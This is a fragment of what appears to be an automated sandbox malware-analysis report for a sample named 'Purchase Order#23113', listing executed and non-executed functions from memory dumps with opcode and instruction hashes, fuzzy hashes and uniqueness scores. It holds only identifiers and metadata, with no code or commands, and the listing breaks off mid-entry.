                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: a012233f95c4498dda793dc8f7e683bb97c46fefb4923c34767977aac201be2c
                                                                            • Instruction ID: 96255fc0c3c5cc4db9def997d2c7359f895492f3f966f28418b89159db2be276
                                                                            • Opcode Fuzzy Hash: a012233f95c4498dda793dc8f7e683bb97c46fefb4923c34767977aac201be2c
                                                                            • Instruction Fuzzy Hash: A3C08C3404530846C2083785A0093743A9CA700301F000060BB0A012A1CE697410C369
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 05B6AD04 Relevance: .0, Instructions: 8COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1773583742.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_5b60000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 1e0336f0ecc58a76a513d882db105b43f7e8fc1139c563699546dbc6a86f3b8b
                                                                            • Instruction ID: 103bd9351f699b0c64b97443b1947e9c0a55333731c0e7cff7bdfa3d6b0b23e0
                                                                            • Opcode Fuzzy Hash: 1e0336f0ecc58a76a513d882db105b43f7e8fc1139c563699546dbc6a86f3b8b
                                                                            • Instruction Fuzzy Hash: C5B012E53E4641E7CA00B3A4CA8983ADD11EFB1B02B60CC5237499002885289CA8D33F
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 05B6A9D2 Relevance: .0, Instructions: 7COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1773583742.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_5b60000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: adeab6c2d9313ff7b1cc1ef659aa6fae5fd898b3b353d227058e374eb899b085
                                                                            • Instruction ID: c0de4d5ee9434a5273897394496381dd63cb2c0ed6b418441210dd785f07ed95
                                                                            • Opcode Fuzzy Hash: adeab6c2d9313ff7b1cc1ef659aa6fae5fd898b3b353d227058e374eb899b085
                                                                            • Instruction Fuzzy Hash: A1B0923A204110AEC702EB50C998E9ABAE5BF546007888091A6848B071D721D82CEB06
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Non-executed Functions

                                                                            Function 05B68F70 Relevance: 5.5, Strings: 4, Instructions: 495COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1773583742.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_5b60000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 4'^q$:$pbq$~
                                                                            • API String ID: 0-999388165
                                                                            • Opcode ID: 562ae18eb9e18a86d8e24f73471b1ef5a1b768466cdc172fe5588ecfd1a8b681
                                                                            • Instruction ID: 9cbaaf934fbffcab73b2124b6c97737118f6585870cb67d6082262a5889be8e9
                                                                            • Opcode Fuzzy Hash: 562ae18eb9e18a86d8e24f73471b1ef5a1b768466cdc172fe5588ecfd1a8b681
                                                                            • Instruction Fuzzy Hash: D932D375A00218DFDB15CFA9C984F99BBB2FF48304F1580E9E509AB262DB35AD91DF10
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 05B60006 Relevance: 2.8, Strings: 2, Instructions: 322COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1773583742.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_5b60000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: fs$JAa
                                                                            • API String ID: 0-3210266105
                                                                            • Opcode ID: 091d4c3127ad11933e28823abe3d3ec12d5ed6dc5298398352a14ad6b77baec8
                                                                            • Instruction ID: 0b73713a0afd3c896b553f8c189fb08dfe192a54f745c9d2c0cb21ced8715737
                                                                            • Opcode Fuzzy Hash: 091d4c3127ad11933e28823abe3d3ec12d5ed6dc5298398352a14ad6b77baec8
                                                                            • Instruction Fuzzy Hash: 8AD15A70D0420ADFCB44DFA6C4858AEFBB2FF89300B54D49AD515AB355E738AA46CF90
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 05B60040 Relevance: 2.8, Strings: 2, Instructions: 302COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1773583742.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_5b60000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: fs$JAa
                                                                            • API String ID: 0-3210266105
                                                                            • Opcode ID: c47c34b4a09c804bcefb3452a66e449d874ced9162610f03fc8c770457e07396
                                                                            • Instruction ID: dd525d40863aad6c411fb122aa065f427a6a802f88332501baf763fd449aef8f
                                                                            • Opcode Fuzzy Hash: c47c34b4a09c804bcefb3452a66e449d874ced9162610f03fc8c770457e07396
                                                                            • Instruction Fuzzy Hash: CDD13770E0420ADFCB44DFA6C4858AEFBB2FF89300B54D499D516AB314D778AA42CF94
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 05B6CB78 Relevance: 2.8, Strings: 2, Instructions: 276COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1773583742.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_5b60000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: q;H$^a
                                                                            • API String ID: 0-3451896257
                                                                            • Opcode ID: 2836726fce3fbf5025e741685a7476c01cac0f2a1230c241884b9837b962b6f7
                                                                            • Instruction ID: 65db3b4af73a6d6ea893d1eb961f8a9ba775b187a8692c898f11b6c57215ba03
                                                                            • Opcode Fuzzy Hash: 2836726fce3fbf5025e741685a7476c01cac0f2a1230c241884b9837b962b6f7
                                                                            • Instruction Fuzzy Hash: E9B11770E1521DDFDB18CFAAC98059EFFB2BF89200F14956AD459BB264DB34A902CF40
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 05B6CB69 Relevance: 2.8, Strings: 2, Instructions: 274COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1773583742.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_5b60000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: q;H$^a
                                                                            • API String ID: 0-3451896257
                                                                            • Opcode ID: 40794efaac6efea16c7ce70a04d2634527bc213ddf674ad5d47e5d28265c2ec7
                                                                            • Instruction ID: 37151188a827cee7d4da1d704b11c7cf5557f14e344a9d03881bf30ea7f8d319
                                                                            • Opcode Fuzzy Hash: 40794efaac6efea16c7ce70a04d2634527bc213ddf674ad5d47e5d28265c2ec7
                                                                            • Instruction Fuzzy Hash: 40B11870E4521DDFDB18CFAAC98059EFBB2BF89200F14946AD459BB264DB34A902CF44
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 05B622F8 Relevance: 2.7, Strings: 2, Instructions: 167COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1773583742.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_5b60000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: Sa1s$a f.
                                                                            • API String ID: 0-1389528605
                                                                            • Opcode ID: 2dcd8a42076e692a666ebaa3d1514c97987d67b3b8678a6be1c536a920692591
                                                                            • Instruction ID: 6c5058eb40695a8c215bf62ec49f4fbb1e75462088f4a9886be6c0cdbfc7b061
                                                                            • Opcode Fuzzy Hash: 2dcd8a42076e692a666ebaa3d1514c97987d67b3b8678a6be1c536a920692591
                                                                            • Instruction Fuzzy Hash: 9371F774E55209DFDB04CFA9C6805EEFBF2FF88210F28946AD419B7314D734AA428B64
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 05B622E8 Relevance: 2.7, Strings: 2, Instructions: 167COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1773583742.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_5b60000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: Sa1s$a f.
                                                                            • API String ID: 0-1389528605
                                                                            • Opcode ID: 44b22814b86c57436107592e3ac26784d08f53cc920eca67989abd1c7e1ad781
                                                                            • Instruction ID: d6ad09a5a0bf451671f56eea6911624e5e3297114b41457b8ff97d3af7020d88
                                                                            • Opcode Fuzzy Hash: 44b22814b86c57436107592e3ac26784d08f53cc920eca67989abd1c7e1ad781
                                                                            • Instruction Fuzzy Hash: E761F774E45209CFDB04CFA9C6819DEFBF2FF88210F28946AD419B7354D734AA428B64
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 05B62750 Relevance: 2.6, Strings: 2, Instructions: 78COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1773583742.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_5b60000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: @$QaM
                                                                            • API String ID: 0-159444895
                                                                            • Opcode ID: c550e46f99b4d140ca721c7a16ed6afae5de36215e6e0c0d5199ce0000b0c2d1
                                                                            • Instruction ID: bc41c387c6559eff18a8428dfb2e1ba889b9c3f038c47c7fa2a75fbcd9ba896f
                                                                            • Opcode Fuzzy Hash: c550e46f99b4d140ca721c7a16ed6afae5de36215e6e0c0d5199ce0000b0c2d1
                                                                            • Instruction Fuzzy Hash: E231C771E006198BEB58CF6BD840B9EFBF3AFC8300F14C1AAD518A7224EB341A458F51
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 05B62740 Relevance: 2.6, Strings: 2, Instructions: 67COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1773583742.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_5b60000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: @$QaM
                                                                            • API String ID: 0-159444895
                                                                            • Opcode ID: a78748f28892ffb7354c8bfb454322e889835ef8b8d0d525480445dad831291b
                                                                            • Instruction ID: b887e4dfe3fd07c8547422dea0e227838828c562f57958f189f353f9f6518723
                                                                            • Opcode Fuzzy Hash: a78748f28892ffb7354c8bfb454322e889835ef8b8d0d525480445dad831291b
                                                                            • Instruction Fuzzy Hash: B521CCB1E016189BEB58CF6BC94079EFAF3AFC8300F14C07AD519A7254EB345A418F51
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 07FB5F58 Relevance: .3, Instructions: 312COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1775782212.0000000007FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07FB0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7fb0000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 4b5289f52ba229066f4acc4486fc0488e87fc898a36698b81837a1a494f6096d
                                                                            • Instruction ID: f082170d7e1cd1c48b828021aa64328c0ceb54404264614e7bd0b803a2162950
                                                                            • Opcode Fuzzy Hash: 4b5289f52ba229066f4acc4486fc0488e87fc898a36698b81837a1a494f6096d
                                                                            • Instruction Fuzzy Hash: F0E1D9B4E0421A8FDB14DFA9C5809AEFBF2FF89304F248169D414AB356D735A942CF61
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 07FB4CB8 Relevance: .3, Instructions: 312COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1775782212.0000000007FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07FB0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7fb0000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 3db3ee50b1ca3f4d6560b5aa32b2adc4c7db6613dc107a4f0dbb1f564a00faaa
                                                                            • Instruction ID: 1c0819745dfb8d352006934d17d52fead38dd16ca5aa8ed220a244e7f346d4aa
                                                                            • Opcode Fuzzy Hash: 3db3ee50b1ca3f4d6560b5aa32b2adc4c7db6613dc107a4f0dbb1f564a00faaa
                                                                            • Instruction Fuzzy Hash: 62E1C9B4E0025A8FCB14DFA9C5809AEFBB2FF89304F248569D414AB356D735AD41CFA1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 07FB4448 Relevance: .3, Instructions: 312COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1775782212.0000000007FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07FB0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7fb0000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: e3660dbfe7f4f6ec9efe888b72470b7b39116e6a3d31cb4d14001fbb8641dc15
                                                                            • Instruction ID: 4bca909cf810b1c1d4502ab441664afc58459a057c05ce049324d6a7e0bffe62
                                                                            • Opcode Fuzzy Hash: e3660dbfe7f4f6ec9efe888b72470b7b39116e6a3d31cb4d14001fbb8641dc15
                                                                            • Instruction Fuzzy Hash: 2FE1C9B4E1025A8FCB14DFA9C5809AEFBB2FF89304F248169D414AB356D735AD42CF61
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 07FB6390 Relevance: .3, Instructions: 312COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1775782212.0000000007FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07FB0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7fb0000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: c2ed2235f92746e9f90e28f61f0960c76236a0d8e2628868b45a0ec6440dde31
                                                                            • Instruction ID: 4b01959a7800aa4c9beab0b63a266ac80a32e69286f2dadd808762c10cae03a8
                                                                            • Opcode Fuzzy Hash: c2ed2235f92746e9f90e28f61f0960c76236a0d8e2628868b45a0ec6440dde31
                                                                            • Instruction Fuzzy Hash: 8DE1D8B4E1021A8FCB14DFA9C5809AEBBF2FF89304F248169D415AB355DB35A942CF61
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 07FB4880 Relevance: .3, Instructions: 312COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1775782212.0000000007FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07FB0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7fb0000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 0b290d97669a9708328d3c6826531f0943392fddc1e9ce244e2e80ec31b3fddf
                                                                            • Instruction ID: 9548a6e5d9806e46def16d3186aa9689bb8fb9020022fec600cd8f547674d2fb
                                                                            • Opcode Fuzzy Hash: 0b290d97669a9708328d3c6826531f0943392fddc1e9ce244e2e80ec31b3fddf
                                                                            • Instruction Fuzzy Hash: D4E1C8B4E0025A8FCB14CFA9C5809AEBBB2FF89304F24C169E415A7356D735A942CF61
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 05B6BA60 Relevance: .3, Instructions: 266COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1773583742.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_5b60000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 5624b036614627da06a3977b3a33903ebc1a3b38ab83bbe8bb5670ea4a48bc18
                                                                            • Instruction ID: 2b49e5e46fccbd554e772c92a65a0c4a6e4620b3485b3765d345dd91ce8c1b85
                                                                            • Opcode Fuzzy Hash: 5624b036614627da06a3977b3a33903ebc1a3b38ab83bbe8bb5670ea4a48bc18
                                                                            • Instruction Fuzzy Hash: A2D10A3182075ACACB10EFB4D990A9DB7B5FF95300F518BAAD44977220EF746AC9CB41
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0142D5BC Relevance: .3, Instructions: 264COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1769980346.0000000001420000.00000040.00000800.00020000.00000000.sdmp, Offset: 01420000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1420000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: df0bc92c9788a122c2e136b41548819a5fdd8b1f3816fa087b554683cae85229
                                                                            • Instruction ID: 73725f3a43fe25604ac3a3ca243b0bd8355999ed3228c546b84371cd0d27a1f1
                                                                            • Opcode Fuzzy Hash: df0bc92c9788a122c2e136b41548819a5fdd8b1f3816fa087b554683cae85229
                                                                            • Instruction Fuzzy Hash: 2BA1A336E002158FCF15DFB5C8405AEB7B2FF95300BA5416AE905AB275DB31D94ACB40
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 05B6BA70 Relevance: .3, Instructions: 264COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1773583742.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_5b60000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: b7dbf62da49fababdcf797baaae928061beec292d5c34c404ae39fb75a846ab2
                                                                            • Instruction ID: 261916a0440a39f933ea86492f46ad3c84518dddb5f72894bdcc1b4840c23bff
                                                                            • Opcode Fuzzy Hash: b7dbf62da49fababdcf797baaae928061beec292d5c34c404ae39fb75a846ab2
                                                                            • Instruction Fuzzy Hash: 48D1F93182075ADACB10EFB4D990A9DB775FF95300F508BAAD44A77220EF746AC9CB41
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 05B61A98 Relevance: .2, Instructions: 162COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1773583742.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_5b60000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: a320999b00af3927334aee8c94951d42b7024bfd7c19efdae59fc105b2d53fea
                                                                            • Instruction ID: 47580ba5bd212e4e8e94c6f0b2b89460680ebb498010aec439bc244f5317b2de
                                                                            • Opcode Fuzzy Hash: a320999b00af3927334aee8c94951d42b7024bfd7c19efdae59fc105b2d53fea
                                                                            • Instruction Fuzzy Hash: EB71D4B4E0520ADFCB44CF99D5808AEFBB2FF89350F14859AD415AB305D738A982CF95
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 05B6D6F8 Relevance: .2, Instructions: 160COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1773583742.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_5b60000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: c04f0ee54d8a38011d282c08dfddc71be384a899c9c30851d3d2d33969d03cb0
                                                                            • Instruction ID: ea0080dd7e98dbadf6e1f42f5a359ce2d0fea097bbd2f0925bc8940179955230
                                                                            • Opcode Fuzzy Hash: c04f0ee54d8a38011d282c08dfddc71be384a899c9c30851d3d2d33969d03cb0
                                                                            • Instruction Fuzzy Hash: 1061C374E051199FCB08CFAAD5809AEFBF2FF88300F24D569D819A7355DB34A942CB91
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 05B6321D Relevance: .2, Instructions: 155COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1773583742.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_5b60000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: d428b53e5d53303163f83911030fd1142482f539c648d1fdaab15ac249891383
                                                                            • Instruction ID: 7fcf75a4c2e2dcd570aa9cf5354cfae6e032a305fb725dbba70dcdaca48f177e
                                                                            • Opcode Fuzzy Hash: d428b53e5d53303163f83911030fd1142482f539c648d1fdaab15ac249891383
                                                                            • Instruction Fuzzy Hash: 1D51EF76D006188BEB29CF6BCC4538AFBF3AFC9600F59C1AAC548AB365DB3555428F01
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 05B61A88 Relevance: .2, Instructions: 154COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1773583742.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_5b60000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: c6fc3ac56b7d19313e8d3f901ccf0c2e4dd2b380a3fff5b4d7489707bf423fe5
                                                                            • Instruction ID: 25c171c94e8c8468d676e43f10299ffe3c321d194c18bf3c634354a43034226c
                                                                            • Opcode Fuzzy Hash: c6fc3ac56b7d19313e8d3f901ccf0c2e4dd2b380a3fff5b4d7489707bf423fe5
                                                                            • Instruction Fuzzy Hash: 7B61D474E0520ADFCB44CFA9D5809AEFBB2FF89310F188556D415A7305D738A982CF95
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 05B69CAB Relevance: .1, Instructions: 144COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1773583742.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_5b60000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 2fc756a8ac24afe25d0b12267fc25f4ca72238f4f9e22f54785aa9ca6d170e4f
                                                                            • Instruction ID: fd27da8d649edf435a3b4cdb3b0db31e40b50a920351611a7c5ebd2450ece217
                                                                            • Opcode Fuzzy Hash: 2fc756a8ac24afe25d0b12267fc25f4ca72238f4f9e22f54785aa9ca6d170e4f
                                                                            • Instruction Fuzzy Hash: DB518F70E052598FCB15CF6AC9809AEFFB2BF89300F24C1AAD444E7256DB34A945CF61
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 05B69CE0 Relevance: .1, Instructions: 133COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1773583742.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_5b60000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 708473d0f5e8c17206eed185908560accea7908431391bdb990d5469b77558a5
                                                                            • Instruction ID: a225b22a1f6ffd8fcc414eb3cffca486a45f21750377e9694c8f0b9ce18e58f5
                                                                            • Opcode Fuzzy Hash: 708473d0f5e8c17206eed185908560accea7908431391bdb990d5469b77558a5
                                                                            • Instruction Fuzzy Hash: E6511F70E05119DBDB14CFAAD9809AEFBB3FB89304F24D1AAD418B7215DB34A945CF60
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 07FB4870 Relevance: .1, Instructions: 130COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1775782212.0000000007FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07FB0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7fb0000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: ddba108d220054018f31c08d7909399b6c9fd1fbd94b9ae6c0a2ca816b7f80ad
                                                                            • Instruction ID: 58c40a2d01996fc7e9c4968d9c8039d5c523ae7fb5972f559c0fb76827d1a492
                                                                            • Opcode Fuzzy Hash: ddba108d220054018f31c08d7909399b6c9fd1fbd94b9ae6c0a2ca816b7f80ad
                                                                            • Instruction Fuzzy Hash: 8751FAB5E0025A8FDB14CFA9C5805AEFBF2FF89305F24816AD418A7356D7349A42CF61
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 07FB4CB1 Relevance: .1, Instructions: 129COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1775782212.0000000007FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07FB0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7fb0000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: f9b3f3e044b4512dfd6367e1f0384371cb5a2adcde66b3ff3abf6c9ce2acae24
                                                                            • Instruction ID: 6f59d29a3c9a4b4806aad5297805cd12b68f2f5bdb5aa3ab3802e6786a2c10d7
                                                                            • Opcode Fuzzy Hash: f9b3f3e044b4512dfd6367e1f0384371cb5a2adcde66b3ff3abf6c9ce2acae24
                                                                            • Instruction Fuzzy Hash: AF51DAB4E0021A8BDB14CFAAD5805AEFBF2FF89304F24C169D418B7256D7359A41CFA1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 07FB443B Relevance: .1, Instructions: 129COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1775782212.0000000007FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07FB0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7fb0000_Purchase Order#23113.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: abf19e7afc6ed1e0b40d1f55b31fd2083ab59e9194b163763aebe9ef61bb517c
                                                                            • Instruction ID: 5d93de28b70c0ec5b01160978eef467406e15152646f4371dde4ffca798516d0
